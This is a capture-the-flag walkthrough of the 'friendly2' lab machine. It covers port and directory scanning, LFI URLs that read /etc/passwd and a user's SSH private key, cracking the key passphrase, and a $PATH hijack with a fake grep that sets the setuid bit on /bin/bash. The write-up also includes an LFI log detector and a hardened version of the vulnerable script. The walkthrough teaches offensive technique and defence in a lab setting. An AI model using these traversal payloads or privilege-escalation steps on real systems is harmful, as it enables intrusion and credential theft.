【OSCP】friendly2

admin, 2024-10-10 11:03:57, 30 views, 3443 characters, about 11 min 28 s read
Target overview

friendly2

Difficulty: easy

Techniques: LFI exploitation, cracking the id_rsa private-key passphrase, sudo privilege escalation via $PATH hijacking

Information gathering

Host discovery

nmap -sn 192.168.1.0/24

Port scan

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -T4 192.168.1.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 02:24 EST
Nmap scan report for 192.168.1.59
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.56 ((Debian))
MAC Address: 08:00:27:0C:8F:A4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.90 seconds

Directory scan

┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.59 -x html,txt,php -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.59
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.59/.html (Status: 403) [Size: 277]
http://192.168.1.59/.php (Status: 403) [Size: 277]
http://192.168.1.59/tools (Status: 301) [Size: 312] [--> http://192.168.1.59/tools/]
http://192.168.1.59/index.html (Status: 200) [Size: 2698]
http://192.168.1.59/assets (Status: 301) [Size: 313] [--> http://192.168.1.59/assets/]
http://192.168.1.59/.php (Status: 403) [Size: 277]
http://192.168.1.59/.html (Status: 403) [Size: 277]
http://192.168.1.59/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished

Gaining access

A hint is found under the tools directory; appending that directory to the URL reaches the HTML page stored alongside it.

Testing shows that the doc parameter is vulnerable to local file inclusion (LFI):

http://192.168.1.59/tools/check_if_exist.php?doc=../../../../../etc/passwd

Further testing reveals the id_rsa private key of the user gh0st:

http://192.168.1.59/tools/check_if_exist.php?doc=../../../../../home/gh0st/.ssh/id_rsa
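From the defender's side, requests like the two above leave a clear trace in the Apache access log. The following shell functions are an added example and not part of the original write-up: they pull the request target out of each common-log-format line, undo one or two rounds of percent-encoding so that `%2e%2e%2f` and `%252e%252e%252f` are seen as `../`, and flag targets that climb out of the web root or name sensitive files. The log lines in SAMPLE_LOG are constructed for this example, and the list of sensitive paths in is_lfi_path is an assumption to be tuned for your own hosts.

```sh
#!/bin/sh
# Added example: spot LFI / path-traversal attempts in an Apache access log.
# Not part of the original write-up; the log lines below are constructed.

# decode_path: stdin -> stdout, undoing percent-encoding of '.', '/' and '%'.
# Two rounds are applied so double-encoded sequences (%252e -> %2e -> .) are
# normalised as well as single-encoded ones.
decode_path() {
    sed -e 's/%2[eE]/./g; s/%2[fF]/\//g; s/%25/%/g' \
        -e 's/%2[eE]/./g; s/%2[fF]/\//g'
}

# is_lfi_path REQUEST_TARGET -> status 0 when the decoded target climbs out of
# the web root or names a sensitive file. The pattern list is an assumption;
# extend it with whatever matters on the hosts you monitor.
is_lfi_path() {
    _decoded=$(printf '%s\n' "$1" | decode_path)
    case $_decoded in
        *../*|*/etc/passwd*|*/etc/shadow*|*/.ssh/*) return 0 ;;
    esac
    return 1
}

# flag_lfi_requests: reads common/combined log lines on stdin and prints
# "CLIENT TARGET" for every request that is_lfi_path considers suspicious.
flag_lfi_requests() {
    while IFS= read -r line; do
        client=${line%% *}
        # the request line is the first double-quoted field: METHOD TARGET PROTO
        req=${line#*\"}
        req=${req%%\"*}
        target=${req#* }
        target=${target%% *}
        if is_lfi_path "$target"; then
            printf '%s %s\n' "$client" "$target"
        fi
    done
}

# count_lfi_hits: stdin -> number of flagged requests.
count_lfi_hits() {
    flag_lfi_requests | wc -l | tr -d ' '
}

# Constructed sample log: two benign requests, the traffic the probing above
# produces in raw, single-encoded and double-encoded form, one more benign
# request, and an absolute-path inclusion attempt.
SAMPLE_LOG='192.168.1.10 - - [28/Feb/2024:02:40:01 -0500] "GET /index.html HTTP/1.1" 200 2698 "-" "Mozilla/5.0"
192.168.1.10 - - [28/Feb/2024:02:40:05 -0500] "GET /tools/check_if_exist.php?doc=report.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.77 - - [28/Feb/2024:02:41:12 -0500] "GET /tools/check_if_exist.php?doc=../../../../../etc/passwd HTTP/1.1" 200 1420 "-" "curl/7.88.1"
192.168.1.77 - - [28/Feb/2024:02:41:30 -0500] "GET /tools/check_if_exist.php?doc=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1420 "-" "curl/7.88.1"
192.168.1.77 - - [28/Feb/2024:02:42:02 -0500] "GET /tools/check_if_exist.php?doc=%252e%252e%252f%252e%252e%252fhome%252fgh0st%252f.ssh%252fid_rsa HTTP/1.1" 200 2655 "-" "curl/7.88.1"
192.168.1.10 - - [28/Feb/2024:02:43:00 -0500] "GET /assets/style.css HTTP/1.1" 200 880 "-" "Mozilla/5.0"
192.168.1.77 - - [28/Feb/2024:02:43:40 -0500] "GET /tools/check_if_exist.php?doc=/etc/passwd HTTP/1.1" 200 1420 "-" "curl/7.88.1"'

# Run with the argument "demo" to scan the constructed sample; otherwise
# source this file and pipe a real log into flag_lfi_requests.
if [ "${1-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_LOG" | flag_lfi_requests
fi
```

The check keys on the decoded request target rather than on the raw line, which is what makes the double-encoded request visible; a rule that only greps the raw log for `../` misses it. A 200 status on a flagged line, as in the sample, is the signal that the inclusion actually succeeded rather than being blocked.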

The id_rsa key can be used for SSH, but it is passphrase-protected, so the passphrase has to be cracked first.

┌──(root㉿kali)-[~]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
celtic (id_rsa)
1g 0:00:00:10 DONE (2024-02-28 03:41) 0.09124g/s 23.35p/s 23.35c/s 23.35C/s tiffany..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Privilege escalation

gh0st@friendly2:~$ cat /opt/security.sh 
#!/bin/bash

echo "Enter the string to encode:"
read string

# Validate that the string is no longer than 20 characters
if [[ ${#string} -gt 20 ]]; then
    echo "The string cannot be longer than 20 characters."
    exit 1
fi

# Validate that the string does not contain special characters
if echo "$string" | grep -q '[^[:alnum:] ]'; then
    echo "The string cannot contain special characters."
    exit 1
fi

sus1='A-Za-z'
sus2='N-ZA-Mn-za-m'

encoded_string=$(echo "$string" | tr $sus1 $sus2)

echo "Original string: $string"
echo "Encoded string: $encoded_string"

The script calls grep by its bare name rather than an absolute path, so we try hijacking PATH to have a script of our own run in its place.

gh0st@friendly2:/tmp$ nano grep
gh0st@friendly2:/tmp$ cat grep
#!/bin/bash
chmod +s /bin/bash
gh0st@friendly2:/tmp$ chmod +x grep

Modify PATH, then run the script so that the file we placed is executed instead of grep.
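The root cause is that /opt/security.sh resolves grep and tr through whatever PATH the invoking user supplies while the script itself runs as root. The script below is an added hardened rewrite, not the box's own file and not from the original post: it resets PATH to a fixed system value inside the encoding function before any external command runs, validates the input with the shell's built-in pattern matching so no external command ever sees the untrusted string, and quotes every expansion (the original's unquoted `tr $sus1 $sus2` and `read` without `-r` are avoided). The TRUSTED_PATH value is an assumption, the usual Debian default.

```sh
#!/bin/sh
# Added example: hardened rewrite of the security.sh shown above.
# Not the box's own file; TRUSTED_PATH is an assumed Debian default.
#
# Defences against the $PATH hijack demonstrated in the write-up:
#   1. rot13_encode never trusts the caller's PATH: it resets PATH to a fixed
#      list of system directories inside a subshell before running tr.
#   2. validate_input uses the shell's own pattern matching (case), so the
#      untrusted string is never handed to an external command for checking.
#   3. Every expansion is quoted and read is invoked with -r.

TRUSTED_PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'

# validate_input STRING -> status 0 if acceptable, 1 otherwise.
# Same rules as the original: at most 20 characters, alphanumerics and spaces only.
validate_input() {
    _s=$1
    if [ "${#_s}" -gt 20 ]; then
        return 1
    fi
    case $_s in
        *[![:alnum:]\ ]*) return 1 ;;   # any character outside the allowed set
    esac
    return 0
}

# rot13_encode STRING -> prints the ROT13 of STRING on stdout.
# The body is a subshell, so the PATH reset does not leak to the caller and
# a fake tr earlier in the caller's PATH is never found.
rot13_encode() (
    PATH=$TRUSTED_PATH
    export PATH
    printf '%s\n' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
)

# Interactive entry point, used only when run as: ./hardened_security.sh encode
if [ "${1-}" = "encode" ]; then
    printf 'Enter the string to encode: '
    IFS= read -r string
    if ! validate_input "$string"; then
        echo "The string must be at most 20 alphanumeric characters or spaces." >&2
        exit 1
    fi
    echo "Original string: $string"
    echo "Encoded string: $(rot13_encode "$string")"
fi
```

Resetting PATH inside the script is the layer the script owner controls; sudo's own `secure_path` option in sudoers (enabled by default on Debian) is the second layer, and a sudo rule that preserves the caller's PATH removes it, which is why hardening the script itself is still worthwhile.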

End

This article was originally published on the WeChat public account 贝雷帽SEC: 【OSCP】friendly2

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact us by e-mail (preferably from a corporate or otherwise valid mailbox so the message is not filtered; contact details are on the home page).
Posted by admin on 2024-10-10 11:03:57.
When reposting, please keep the link to this article (CN-SEC中文网; thanks to the original author for their work): 【OSCP】friendly2 http://cn-sec.com/archives/3248006.html